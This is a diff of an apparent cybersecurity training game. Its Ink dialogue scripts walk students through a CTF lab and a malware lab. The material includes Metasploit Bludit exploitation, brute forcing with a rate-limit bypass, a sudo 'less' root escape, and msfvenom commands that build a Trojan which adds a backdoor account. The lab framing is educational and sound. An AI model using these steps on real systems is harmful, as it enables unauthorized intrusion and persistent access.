+ [I'm stuck - give me a hint about privilege escalation]
-> ctf_privesc_hints
+ [Tell me about the web security tools]
-> web_tools_intro
+ [I want to switch to guided mode]
-> switch_to_guided
+ [I'm done - show me the solution walkthrough]
-> guided_mode_hub
+ [That's all for now]
#exit_conversation
-> guided_mode_hub
=== ctf_recon_hints ===
Alright, here's a hint for reconnaissance:
Start with Nmap to identify services and versions: nmap \-sV TARGET_IP
Use Dirb to find hidden directories: dirb http://TARGET_IP
Use Nikto for web vulnerabilities: nikto \-h http://TARGET_IP
Look carefully at discovered files - some contain very useful information about usernames and passwords!
The CMS being used might have known exploits. Identify what CMS is running.
~ instructor_rapport += 5
#influence_increased
-> ctf_mode_hub
=== ctf_exploit_hints ===
Here's a hint for exploitation:
You should have discovered Bludit CMS running on the server.
Search Metasploit for Bludit exploits: search bludit
You'll need both a username and password - these might have been leaked in hidden files.
If you only have the username, consider brute-forcing the password using OWASP ZAP.
The Bludit vulnerability allows arbitrary code execution and should give you a Meterpreter shell.
~ instructor_rapport += 5
#influence_increased
-> ctf_mode_hub
=== ctf_privesc_hints ===
Here's a hint for privilege escalation:
After gaining initial access, check what sudo commands your user can run: sudo \-l
If your user can run certain commands with sudo, look for ways to escape from those commands to get a root shell.
The 'less' command is particularly interesting - it can execute shell commands with !<command>
If you can run 'less' with sudo, you can escape to a root shell!
~ instructor_rapport += 5
#influence_increased
-> ctf_mode_hub
=== switch_to_guided ===
Switching to guided mode. I'll walk you through the complete solution.
~ challenge_mode = "guided"
-> guided_mode_hub
=== guided_mode_hub ===
Welcome to guided mode. I'll walk you through each phase of the challenge.
+ [Part 1: Information gathering and reconnaissance]
-> phase_1_recon
+ [Part 2: Exploitation and gaining access]
-> phase_2_exploitation
+ [Part 3: Optional - Brute forcing with OWASP ZAP]
-> phase_3_bruteforce
+ [Part 4: Post-exploitation and flag hunting]
-> phase_4_post_exploit
+ [Part 5: Privilege escalation to root]
-> phase_5_privesc
+ [Tell me about web security tools first]
-> web_tools_intro
+ [Show me the complete solution]
-> complete_walkthrough
+ [Switch to CTF mode (no more guidance)]
~ challenge_mode = "ctf"
-> ctf_mode_hub
+ [That's all for now]
#exit_conversation
-> guided_mode_hub
=== web_tools_intro ===
Let me introduce the key web security tools you'll need.
~ instructor_rapport += 5
#influence_increased
Dirb is a web content scanner that finds hidden files and directories using dictionary attacks.
Nikto is a web vulnerability scanner that checks for dangerous files, outdated software, and misconfigurations.
OWASP ZAP is an intercepting proxy that lets you capture, modify, and replay HTTP requests - perfect for brute forcing.
+ [How do I use Dirb?]
Dirb is straightforward: dirb http://TARGET_IP
It uses a built-in dictionary to test common paths like /admin/, /backup/, /config/, etc.
Pay attention to discovered files - they often contain credentials or sensitive configuration data.
Right-click discovered URLs to open them in your browser and examine their contents.
~ instructor_rapport += 5
#influence_increased
+ [How do I use Nikto?]
Nikto scans for web vulnerabilities: nikto \-h http://TARGET_IP
It checks for over 6,000 security issues including dangerous files, server misconfigurations, and known vulnerabilities.
The output shows each finding with references for more information.
Nikto results help you understand what attacks might be successful.
~ instructor_rapport += 5
#influence_increased
+ [How do I use OWASP ZAP?]
OWASP ZAP acts as a proxy between your browser and the web server.
It intercepts HTTP requests and responses, allowing you to modify and replay them.
This is incredibly useful for brute forcing login forms, especially those with CSRF protection.
You can also use it to bypass IP-based rate limiting with the X-Forwarded-For header.
~ instructor_rapport += 5
#influence_increased
{challenge_mode == "ctf": -> ctf_mode_hub | -> guided_mode_hub}
=== phase_1_recon ===
Phase 1 is all about information gathering - discovering what you're dealing with before launching attacks.
~ instructor_rapport += 5
#influence_increased
The attack methodology follows this sequence: reconnaissance, scanning, exploitation, post-exploitation, and privilege escalation.
Each phase builds on the previous, so thorough reconnaissance is crucial.
+ [What should I scan for?]
Start with network reconnaissance: nmap \-sV TARGET_IP
This identifies open ports, running services, and software versions.
Then scan the web application: dirb http://TARGET_IP
Follow up with: nikto \-h http://TARGET_IP
Look for admin panels, configuration files, backup files, and anything that might contain credentials.
~ instructor_rapport += 5
#influence_increased
+ [What am I looking for specifically?]
You're looking for several things:
What CMS (Content Management System) is running? This tells you what exploits might work.
Are there leaked credentials in discovered files? Check text files, logs, and backups.
Is there an admin login page? You might need to access it.
What server software and versions are running? This helps identify known vulnerabilities.
There's also a flag hidden in one of the discovered files!
~ instructor_rapport += 5
#influence_increased
+ [Walk me through the reconnaissance process]
Here's the step-by-step process:
1. Run Nmap: nmap \-sV \-p- TARGET_IP (scan all ports with version detection)
2. Run Dirb: dirb http://TARGET_IP (find hidden directories and files)
3. Run Nikto: nikto \-h http://TARGET_IP (identify web vulnerabilities)
4. Browse discovered URLs - open them in Firefox to see what they contain
5. Look for patterns: usernames on the website, admin pages, leaked files
6. Document everything - the CMS name, discovered usernames, any found credentials
The reconnaissance might reveal Bludit CMS with an admin login at /admin/
~ instructor_rapport += 5
#influence_increased
- -> guided_mode_hub
=== phase_2_exploitation ===
Phase 2 is exploitation - using discovered vulnerabilities to gain access.
~ instructor_rapport += 5
#influence_increased
Based on your reconnaissance, you should have identified Bludit CMS running on the server.
Bludit has known vulnerabilities that we can exploit using Metasploit.
+ [How do I find Bludit exploits?]
In Metasploit, search for Bludit: search bludit
You'll find several modules. Look for ones related to code execution or file upload.
Use info to read about each exploit: info exploit/linux/http/bludit_upload_images_exec
This particular exploit allows arbitrary code execution through image upload functionality.
~ instructor_rapport += 5
#influence_increased
+ [What do I need to exploit Bludit?]
The Bludit exploit requires several pieces of information:
RHOSTS: The target IP address
BLUDITUSER: The Bludit admin username (should have been discovered during recon)
BLUDITPASS: The admin password (might have been leaked, or you'll need to brute force it)
TARGETURI: Typically / (the root of the web server)
The exploit will give you a Meterpreter shell if successful!
~ instructor_rapport += 5
#influence_increased
+ [What if I don't have the password?]
If you found the username but not the password, you have options:
Check all discovered files thoroughly - passwords are sometimes leaked in config files or backups
If truly not found, you can brute force it using OWASP ZAP (covered in optional Phase 3)
Bludit has CSRF protection and rate limiting, making brute forcing tricky but possible
~ instructor_rapport += 5
#influence_increased
+ [Walk me through the exploitation]
Here's the complete exploitation process:
1. Start Metasploit: msfconsole
2. Search: search bludit
3. Use the upload_images exploit: use exploit/linux/http/bludit_upload_images_exec
4. Show options: show options
5. Set target: set RHOSTS TARGET_IP
6. Set username: set BLUDITUSER admin (or discovered username)
7. Set password: set BLUDITPASS <discovered_password>
8. Run exploit: exploit
If successful, you'll get a Meterpreter shell! This is your foothold in the system.
~ instructor_rapport += 5
#influence_increased
- -> guided_mode_hub
=== phase_3_bruteforce ===
Phase 3 is optional - brute forcing the Bludit password if you only have the username.
~ instructor_rapport += 5
#influence_increased
Bludit has protections against brute forcing: CSRF tokens and IP-based rate limiting.
OWASP ZAP can bypass these protections with the right configuration.
+ [How does CSRF protection work?]
CSRF (Cross-Site Request Forgery) tokens are randomly generated by the server.
The server sends a token in each response, and the client must include it in the next request.
This prevents simple replay attacks because each request needs the current token.
OWASP ZAP can extract tokens from responses and insert them into requests automatically.
~ instructor_rapport += 5
#influence_increased
+ [How does rate limiting protection work?]
After a certain number of failed login attempts from the same IP, Bludit blocks that IP temporarily.
You'll see messages like "Too many incorrect attempts. Try again in 30 minutes."
However, we can bypass this using the X-Forwarded-For HTTP header.
By randomizing the X-Forwarded-For IP, we make each attempt appear to come from a different client.
~ instructor_rapport += 5
#influence_increased
+ [Walk me through the ZAP brute force process]
This is complex, so pay attention:
1. Launch OWASP ZAP and configure it as a proxy
2. Install the random_x_forwarded_for_ip.js script from the ZAP community scripts
3. Browse to the Bludit login page through ZAP
4. Attempt a login to capture the HTTP request in ZAP's history
5. Right-click the POST request and select "Fuzz..."
6. Select the password field and add a payload with common passwords
7. Add the X-Forwarded-For script as a message processor
8. Launch the fuzzer and look for different HTTP response codes
Successful logins typically return 301 or 302 (redirect) instead of 200 (error message).
~ instructor_rapport += 5
#influence_increased
- -> guided_mode_hub
=== phase_4_post_exploit ===
Phase 4 is post-exploitation - exploring the compromised system and hunting for flags.
~ instructor_rapport += 5
#influence_increased
You should have a Meterpreter shell from the exploitation phase.
Now it's time to explore the system, understand your access level, and find flags.
+ [What Meterpreter commands should I use?]
Essential Meterpreter commands for exploration:
getuid - Shows your current username
sysinfo - System information (OS, architecture, etc.)
pwd - Print working directory
ls - List files in current directory
cat filename - Read file contents
cd /path - Change directory
shell - Drop to OS shell (Ctrl-C to return to Meterpreter)
~ instructor_rapport += 5
#influence_increased
+ [Where should I look for flags?]
Flags are hidden in various locations:
Check your current directory - there might be a flag right where you land
Look in user home directories: /home/username/
Different users might have different flags
Eventually, you'll need to check /root/ but that requires privilege escalation
Some flags might be in encrypted files - note encryption hints for later
~ instructor_rapport += 5
#influence_increased
+ [How do I switch users?]
To switch users, you need to drop to an OS shell first:
From Meterpreter, run: shell
Now you have a Linux shell. Use: su username
However, you'll need the user's password to switch
If you discovered the Bludit admin user's password earlier, you can switch to that user
Return to Meterpreter with Ctrl-C when done
~ instructor_rapport += 5
#influence_increased
- -> guided_mode_hub
=== phase_5_privesc ===
Phase 5 is privilege escalation - gaining root access to fully control the system.
~ instructor_rapport += 5
#influence_increased
Your initial shell is likely running as the www-data user (the web server user) with limited privileges.
To access all system files and read flags in /root/, you need to escalate to root.
+ [How do I check my privileges?]
From a shell, check your privileges:
whoami - Shows your username
id - Shows UID, GID, and groups
sudo \-l - Lists commands you can run with sudo
Note: You might need a proper TTY terminal first: python3 -c 'import pty; pty.spawn("/bin/bash")'
This spawns a proper terminal that sudo will accept.
~ instructor_rapport += 5
#influence_increased
+ [What's the sudo privilege escalation method?]
When you run sudo \-l, you'll see what commands you can run as root.
If you can run /usr/bin/less with sudo, that's your ticket to root!
The 'less' command is a pager for viewing files, but it can also execute shell commands.
When viewing a file with less, press ! followed by a command to execute it.
Since less is running with sudo privileges, any command you run will execute as root!
~ instructor_rapport += 5
#influence_increased
+ [Walk me through getting root access]
Here's the complete privilege escalation process:
1. Drop to shell from Meterpreter: shell
2. Spawn a proper terminal: python3 -c 'import pty; pty.spawn("/bin/bash")'
3. Check sudo permissions: sudo \-l
4. You should see you can run less on a specific file
5. Run that command with sudo: sudo /usr/bin/less /path/to/file
6. When the file is displayed, type: !id
7. You should see uid=0 (root!) in the output
8. Now type: !/bin/bash
9. You now have a root shell! Verify with: whoami
Now you can access /root/ and find the final flags!
~ instructor_rapport += 5
#influence_increased
- -> guided_mode_hub
=== complete_walkthrough ===
Here's the complete solution walkthrough from start to finish:
~ instructor_rapport += 10
#influence_increased
~ ctf_mastery += 20
#influence_increased
Phase 1 - Reconnaissance:
nmap \-sV \-p- TARGET_IP
dirb http://TARGET_IP
nikto \-h http://TARGET_IP
Browse discovered files, find admin login at /admin/, discover Bludit CMS, find leaked credentials
Phase 2 - Exploitation:
msfconsole
search bludit
use exploit/linux/http/bludit_upload_images_exec
set RHOSTS TARGET_IP
set BLUDITUSER admin (or discovered username)
set BLUDITPASS discovered_password
exploit
Phase 3 - Post-Exploitation:
getuid, sysinfo, ls, cat flag.txt (in current directory)
shell
su bludit_admin (with discovered password)
cat ~/flag.txt (in that user's home)
Phase 4 - Privilege Escalation:
python3 -c 'import pty; pty.spawn("/bin/bash")'
sudo \-l (discover you can run less on a specific file)
sudo /usr/bin/less /path/to/file
!id (verify root)
!/bin/bash (spawn root shell)
cd /root && ls (find final flags)
That's the complete solution! Try to replicate it yourself now that you understand the approach.
-> guided_mode_hub

1
scenarios/lab_feeling_blu/ink/instructor.json Normal file
View File

File diff suppressed because one or more lines are too long

70
scenarios/lab_feeling_blu/mission.json Normal file
View File

@@ -0,0 +1,70 @@
{
"display_name": "Feeling Blu",
"description": "A comprehensive Capture The Flag challenge that brings together everything you've learned. Exploit a web server, gain access, escalate privileges, and hunt for flags. This simulates a real-world penetration test from start to finish.",
"difficulty_level": 2,
"secgen_scenario": "labs/introducing_attacks/9_feeling_blu.xml",
"collection": "vm_labs",
"cybok": [
{
"ka": "WAM",
"topic": "Fundamental Concepts and Approaches",
"keywords": ["authentication", "passwords and alternatives"]
},
{
"ka": "AAA",
"topic": "Authentication",
"keywords": ["user authentication", "BRUTEFORCE"]
},
{
"ka": "WAM",
"topic": "Server-Side Vulnerabilities and Mitigations",
"keywords": ["server-side misconfiguration and vulnerable components", "FILE UPLOAD VULNERABILITY"]
},
{
"ka": "MAT",
"topic": "Attacks and exploitation",
"keywords": ["EXPLOITATION", "EXPLOITATION FRAMEWORKS"]
},
{
"ka": "SS",
"topic": "Categories of Vulnerabilities",
"keywords": ["CVEs and CWEs"]
},
{
"ka": "SOIM",
"topic": "PENETRATION TESTING",
"keywords": ["PENETRATION TESTING - SOFTWARE TOOLS", "PENETRATION TESTING - ACTIVE PENETRATION"]
},
{
"ka": "AAA",
"topic": "Authorisation",
"keywords": ["access control", "Elevated privileges", "Vulnerabilities and attacks on access control misconfigurations"]
},
{
"ka": "OSV",
"topic": "Primitives for Isolation and Mediation",
"keywords": ["Access controls and operating systems", "Linux security model", "Attacks against SUDO"]
},
{
"ka": "AB",
"topic": "Models",
"keywords": ["kill chains"]
},
{
"ka": "MAT",
"topic": "Malicious Activities by Malware",
"keywords": ["cyber kill chain"]
},
{
"ka": "AC",
"topic": "Symmetric Cryptography",
"keywords": ["symmetric encryption and authentication"]
},
{
"ka": "AAA",
"topic": "Authentication",
"keywords": ["BRUTEFORCE"]
}
]
}

170
scenarios/lab_feeling_blu/scenario.json.erb Normal file
View File

@@ -0,0 +1,170 @@
{
"scenario_brief": "Welcome to the Feeling Blu CTF Challenge! Your CTF Challenge Coordinator will guide you through a comprehensive Capture The Flag challenge. Exploit a web server, gain access, escalate privileges, and hunt for flags. Complete the instruction and then practice your skills in the VM lab environment.",
"endGoal": "Complete the lab instruction with the CTF Challenge Coordinator, launch the VMs, and capture all available flags from the web server to demonstrate your understanding of web exploitation, post-exploitation, and privilege escalation.",
"startRoom": "instruction_room",
"startItemsInInventory": [],
"globalVariables": {
"player_name": "Agent 0x00",
"lab_instruction_complete": false,
"vm_launched": false,
"ctf_flag_submitted": false,
"instructor_rapport": 0,
"ctf_mastery": 0
},
"objectives": [
{
"aimId": "complete_vm_lab",
"title": "Complete VM Lab Exercises",
"description": "Capture all flags from the web server",
"status": "active",
"order": 0,
"tasks": [
{
"taskId": "submit_all_flags",
"title": "Submit all required flags from web server",
"type": "submit_flags",
"targetFlags": ["web_server-flag1", "web_server-flag2", "web_server-flag3", "web_server-flag4", "web_server-flag5"],
"targetCount": 5,
"currentCount": 0,
"showProgress": true,
"status": "active"
}
]
}
],
"player": {
"id": "player",
"displayName": "Agent 0x00",
"spriteSheet": "hacker",
"spriteTalk": "assets/characters/hacker-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
}
},
"rooms": {
"instruction_room": {
"type": "room_office",
"connections": {
"north": "vm_lab_room"
},
"locked": false,
"npcs": [
{
"id": "ctf_challenge_coordinator",
"displayName": "CTF Challenge Coordinator",
"npcType": "person",
"position": { "x": 3.5, "y": 3.5 },
"spriteSheet": "hacker-red",
"spriteTalk": "assets/characters/hacker-red-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
},
"storyPath": "scenarios/lab_feeling_blu/ink/instructor.json",
"currentKnot": "start",
"timedConversation": {
"delay": 5000,
"targetKnot": "intro_timed"
},
"eventMappings": [
{
"eventPattern": "objective_aim_completed:complete_vm_lab",
"targetKnot": "flags_completed_congrats",
"conversationMode": "person-chat",
"autoTrigger": true,
"cooldown": 0
}
],
"itemsHeld": []
}
],
"objects": [
{
"type": "lab-workstation",
"id": "lab_workstation",
"name": "Lab Sheet Workstation",
"takeable": true,
"labUrl": "https://cliffe.github.io/HacktivityLabSheets/labs/introducing_attacks/9-feeling-blu/",
"observations": "A workstation for accessing the lab sheet with detailed instructions and exercises"
},
{
"type": "notes",
"name": "Lab Welcome Guide",
"takeable": true,
"readable": true,
"text": "Welcome to the Feeling Blu CTF Challenge!\n\nOBJECTIVES:\n1. Use the Lab Sheet Workstation to access detailed lab instructions\n2. Complete the lab sheet exercises\n3. Launch the VMs and practice CTF techniques\n4. Capture all flags from the web server\n\nThe CTF Challenge Coordinator is available if you need guidance.\n\nGood luck!",
"observations": "A guide to the lab structure and objectives"
},
{
"type": "notes",
"name": "VM Lab Instructions",
"takeable": true,
"readable": true,
"text": "VM Lab Practice Instructions:\n\n1. Launch the VMs in the VM Lab Room:\n - Kali VM Terminal: Your attacker machine with Nmap, Dirb, Nikto, Metasploit, and OWASP ZAP\n - Web Server Terminal: Target for exploitation\n\n2. Your objectives:\n - Use Nmap, Dirb, and Nikto for reconnaissance\n - Identify and exploit Bludit CMS vulnerabilities\n - Use Metasploit to gain initial access\n - Perform post-exploitation and hunt for flags\n - Escalate privileges to root using sudo vulnerabilities\n - Decrypt encrypted files to find additional flags\n\n3. Submit flags at the Flag Submission Terminal in the VM Lab Room\n\nFlags to capture from web_server:\n- flag1 - After initial exploitation\n- flag2 - In user home directory\n- flag3 - After privilege escalation\n- flag4 - Additional flag from privilege escalation\n- flag5 - From encrypted zip file in /root/\n\nRemember what the coordinator taught you about CTF techniques!",
"observations": "Instructions for the VM lab exercises"
}
]
},
"vm_lab_room": {
"type": "room_office",
"connections": {
"south": "instruction_room"
},
"locked": false,
"objects": [
{
"type": "vm-launcher",
"id": "vm_launcher_kali",
"name": "Kali VM Terminal",
"takeable": false,
"observations": "Terminal providing access to the Kali Linux attacker machine with Nmap, Dirb, Nikto, Metasploit, and OWASP ZAP",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('feeling_blu', {
"id": 1,
"title": "attack_vm",
"ip": "172.16.0.2",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_web_server",
"name": "Web Server Terminal",
"takeable": false,
"observations": "Terminal providing access to the web server for CTF exploitation practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('feeling_blu', {
"id": 2,
"title": "web_server",
"ip": "172.16.0.3",
"enable_console": true
}) %>
},
{
"type": "flag-station",
"id": "flag_station_lab",
"name": "Lab Flag Submission Terminal",
"takeable": false,
"observations": "Submit flags captured from the web server here",
"acceptsVms": ["web_server"],
"flags": <%= flags_for_vm('web_server', [
'flag{feeling_blu_initial_exploit}',
'flag{feeling_blu_user_flag}',
'flag{feeling_blu_privilege_escalation}',
'flag{feeling_blu_root_flag}',
'flag{feeling_blu_encrypted_flag}'
]) %>,
"flagRewards": [
{
"type": "emit_event",
"event_name": "ctf_flag_submitted",
"description": "CTF flag submitted - demonstrates CTF exploitation skills"
}
]
}
]
}
}
}

4
scenarios/lab_intro_linux/scenario.json.erb
View File

@@ -100,8 +100,8 @@
"storyPath": "scenarios/lab_intro_linux/ink/instructor.json",
"currentKnot": "start",
"timedConversation": {
"delay": 3000,
"knot": "intro_timed"
"delay": 5000,
"targetKnot": "intro_timed"
},
"eventMappings": [
{

722
scenarios/lab_malware_metasploit/ink/instructor.ink Normal file
View File

@@ -0,0 +1,722 @@
// ===========================================
// MALWARE AND METASPLOIT LAB
// Introduction to Malware and Payloads
// ===========================================
// Game-Based Learning replacement for lab sheet
// Original: introducing_attacks/2_malware_msf_payloads.md
// ===========================================
// Global persistent state
VAR instructor_rapport = 0
VAR ethical_awareness = 0
// Global variables (synced from scenario.json.erb)
VAR player_name = "Agent 0x00"
// ===========================================
// ENTRY POINT
// ===========================================
=== start ===
~ instructor_rapport = 0
Welcome back, {player_name}. What would you like to discuss?
-> malware_hub
// ===========================================
// TIMED INTRO CONVERSATION (Game Start)
// ===========================================
=== intro_timed ===
~ instructor_rapport = 0
Welcome to Malware Analysis and Metasploit Fundamentals, {player_name}. I'm your Malware Specialist instructor for this session.
This lab covers malicious software - what it is, how it works, and how to create and analyze it in controlled environments. You'll learn about malware types, the Metasploit Framework, payload generation, and evasion techniques.
Before we begin, ethical boundaries reminder: everything we cover is for authorized penetration testing and security research. Creating or deploying malware against systems you don't have explicit permission to test is illegal.
Let me explain how this lab works. You'll find two key resources here:
First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.
Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with both a Kali Linux attacker machine with Metasploit and a Windows victim system for hands-on practice.
You can talk to me anytime to explore malware concepts, get tips, or ask questions about the material. I'm here to help guide your learning.
Ready to get started? Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.
-> malware_hub
// ===========================================
// MAIN HUB
// ===========================================
=== malware_hub ===
What aspect of malware and Metasploit would you like to explore?
+ [Types of malware and classifications]
-> malware_types
+ [Introduction to Metasploit Framework]
-> metasploit_intro
+ [Creating payloads with msfvenom]
-> msfvenom_basics
+ [Anti-malware detection methods]
-> antimalware_detection
+ [Evasion techniques and polymorphic malware]
-> evasion_techniques
+ [Remote Access Trojans (RATs)]
-> rat_intro
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> malware_hub
// ===========================================
// MALWARE TYPES
// ===========================================
=== malware_types ===
~ instructor_rapport += 5
#influence_increased
Malware - malicious software. Programs designed to carry out harmful actions.
Microsoft's old TechNet essay put it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore."
That's the core threat. A program running on your system has access to everything you have access to. If it runs as admin/root, even worse.
* [What are the main types?]
You: How is malware classified?
-> malware_taxonomy
* [Why target Windows most?]
You: Why is Windows the primary target?
Market share. Windows dominates desktop OS usage. More targets means more potential victims.
Though macOS, Linux, Android, iOS all have malware too. Platform diversity is shifting the landscape.
Also, each Windows version adds security mitigations. We test on Windows 7 in labs because its mitigations are well-understood and bypassable for learning purposes.
~ instructor_rapport += 5
#influence_increased
-> malware_types
* [Understood]
-> malware_hub
=== malware_taxonomy ===
~ instructor_rapport += 8
#influence_increased
Main classifications:
Trojans - malicious software posing as legitimate. Named after the Greek myth. A "game" that's actually a backdoor.
Doesn't self-propagate, may provide remote access (RAT - Remote Access Trojan), may spy on users (spyware, keyloggers), or may force advertising (adware).
Viruses - automatically spread to other programs on the same system. Infect executables, documents, boot sectors.
Worms - automatically spread to other computers on the network. Self-propagating across systems via exploits, email, etc.
Rootkits - hide the presence of infection. Manipulate OS to conceal malicious processes, files, network connections.
Zombies/Botnets - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining.
Ransomware - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity.
* [Tell me more about Trojans]
You: Trojans seem most relevant to this lab?
Correct. We'll focus on creating Trojan horses - programs that appear innocent but perform malicious actions.
Social engineering is key. Convince victim to run it. No exploitation required if they willingly execute it.
~ instructor_rapport += 8
#influence_increased
-> malware_hub
* [How do these overlap?]
You: Can malware be multiple types?
Absolutely. A Trojan worm that installs a rootkit, for example.
Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities.
Taxonomy helps us discuss and categorize, but real malware can be complex, multi-functional.
~ instructor_rapport += 10
#influence_increased
-> malware_hub
* [Got it]
-> malware_hub
// ===========================================
// METASPLOIT FRAMEWORK
// ===========================================
=== metasploit_intro ===
~ instructor_rapport += 5
#influence_increased
Metasploit Framework - one of the most powerful penetration testing tools available.
Contains extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools. Framework for developing custom exploits.
Open source, maintained by Rapid7. Free framework version (what we use) and commercial Pro version with GUI.
We're using command-line tools - teaches you more about concepts and mechanics.
* [What can Metasploit do?]
You: What's the scope of Metasploit's capabilities?
Enormous scope: exploit development and execution, payload generation (what we're focusing on), post-exploitation (once you've compromised a system), auxiliary modules (scanners, sniffers, fuzzers), and evasion and anti-forensics.
~ instructor_rapport += 8
#influence_increased
-> metasploit_intro
* [Why is it legal to distribute?]
You: How is this legal if it creates malware?
~ ethical_awareness += 10
#influence_increased
Excellent question. Shows good critical thinking.
Metasploit is a *tool*. Hammer can build houses or break windows. The tool isn't illegal - misuse is.
Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises.
It's widely used by security professionals to identify weaknesses before attackers do.
~ instructor_rapport += 15
#influence_increased
-> metasploit_intro
* [Tell me about payloads]
You: What exactly is a payload?
-> payload_explanation
* [Back to main menu]
-> malware_hub
=== payload_explanation ===
~ instructor_rapport += 8
#influence_increased
Payload - the malicious code you want to execute on a victim's system.
The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access.
Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access.
msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code.
* [How do I see available payloads?]
You: How many payloads exist?
`msfvenom -l payloads` piped to `less` lists them all. Hundreds.
Platform-specific: windows, linux, osx, android, etc.
Various functions: shells, meterpreter, exec commands, VNC, etc.
Each has configurable options for IP addresses, ports, usernames, etc.
~ instructor_rapport += 5
#influence_increased
-> payload_explanation
* [What's the simplest payload?]
You: What's a basic example?
`windows/adduser` - simply adds a user account to Windows.
Configuration: USER= (username), PASS= (password)
Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe`
Victim runs trojan.exe, new admin account created. Simple, effective Trojan.
~ instructor_rapport += 5
#influence_increased
-> payload_explanation
* [Understood]
-> metasploit_intro
// ===========================================
// MSFVENOM BASICS
// ===========================================
=== msfvenom_basics ===
~ instructor_rapport += 5
#influence_increased
msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality.
Generates standalone payloads in various formats: executables, shellcode, scripts, etc.
Basic workflow: Choose payload, configure options, select output format, and generate file.
* [Walk me through creating a Trojan]
You: Show me the complete process.
-> trojan_creation_walkthrough
* [What output formats exist?]
You: What formats can msfvenom generate?
`msfvenom -l formats` lists them all.
Common formats: exe (Windows executable), elf (Linux executable), dll (Windows library), python, ruby, perl (Scripts in various languages), c, java (Source code), and raw (Raw shellcode).
Choose format based on target platform and delivery method.
~ instructor_rapport += 8
#influence_increased
-> msfvenom_basics
* [How do I configure payloads?]
You: What about payload options?
`msfvenom -p payload_name --list-options` shows available options.
Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc.
Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123`
~ instructor_rapport += 5
#influence_increased
-> msfvenom_basics
* [Back to main menu]
-> malware_hub
=== trojan_creation_walkthrough ===
~ instructor_rapport += 10
#influence_increased
Complete Trojan creation example:
Step 1: Choose payload
`msfvenom -l payloads` then `grep windows/adduser`
Step 2: Check options
`msfvenom -p windows/adduser --list-options`
Step 3: Generate executable
`msfvenom -p windows/adduser USER=backdoor PASS=SecurePass123 -f exe > game.exe`
Step 4: Deliver to victim (in lab: web server)
`sudo cp game.exe /var/www/html/share/`
`sudo service apache2 start`
Step 5: Victim downloads and runs game.exe
(Social engineering: "Free game! Click to play!")
Step 6: Verify success
On victim system: `net user` shows new backdoor account
That's the basic flow. Simple but effective if victim trusts you enough to run the file.
* [How do I make it less suspicious?]
You: How do I make it seem legitimate?
Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality.
We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality.
~ instructor_rapport += 10
#influence_increased
-> msfvenom_basics
* [What about detection?]
You: Won't anti-malware catch this?
Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware.
That's why we need evasion techniques - encoding, obfuscation, template injection.
-> antimalware_detection
* [Clear walkthrough]
-> msfvenom_basics
// ===========================================
// ANTI-MALWARE DETECTION
// ===========================================
=== antimalware_detection ===
~ instructor_rapport += 5
#influence_increased
Anti-malware software - defensive tools attempting to detect and block malicious software.
Two main detection approaches: signature-based and anomaly-based.
* [Explain signature-based detection]
You: How does signature-based detection work?
-> signature_based
* [Explain anomaly-based detection]
You: How does anomaly-based detection work?
-> anomaly_based
* [How do I test against anti-malware?]
You: How can I test my payloads?
ClamAV - open-source anti-malware scanner.
`clamscan` scans current directory for malware.
Basic msfvenom payloads get detected immediately. Tells you if your evasion worked.
VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security.
~ instructor_rapport += 8
#influence_increased
-> antimalware_detection
* [Back to main menu]
-> malware_hub
=== signature_based ===
~ instructor_rapport += 8
#influence_increased
Signature-based detection - blacklist of known malware patterns.
How it works: Malware researchers analyze malicious code, extract unique signatures (byte patterns, hashes, code structures), add to signature database, and scanner compares files against database.
Advantages: High accuracy for known threats, low false positive rate, resource efficient, and mature, well-understood technology.
Disadvantages: Useless against unknown malware (zero-days), requires constant signature updates, polymorphic malware can evade (same function, different code), and always reactive, never proactive.
* [How do hashes relate to signatures?]
~ instructor_rapport += 10
#influence_increased
You: You mentioned hashes earlier?
Simple signature approach: hash the entire malware file.
`sha256sum malware.exe` produces unique fingerprint.
Change one byte? Completely different hash. That's the evasion opportunity.
Re-encode payload → different file → different hash → evades hash-based detection.
Modern scanners use more sophisticated signatures than simple hashes, but principle remains.
~ instructor_rapport += 10
#influence_increased
-> signature_based
* [Understood]
-> antimalware_detection
=== anomaly_based ===
~ instructor_rapport += 8
#influence_increased
Anomaly-based detection - identifies malicious behavior rather than known signatures.
How it works: Establish baseline of normal system behavior, monitor processes, registry changes, network connections, file access, flag deviations from normal as potentially malicious, and may use machine learning, heuristics, behavioral analysis.
Advantages: Detects unknown threats (zero-days), adapts to new attack methods, more comprehensive than signature matching, and less dependent on frequent updates.
Disadvantages: False positives (legitimate software flagged), complex implementation and tuning, resource intensive (continuous monitoring), and difficult to establish baseline (what's "normal"?)
* [Give me an example]
You: What behaviors trigger anomaly detection?
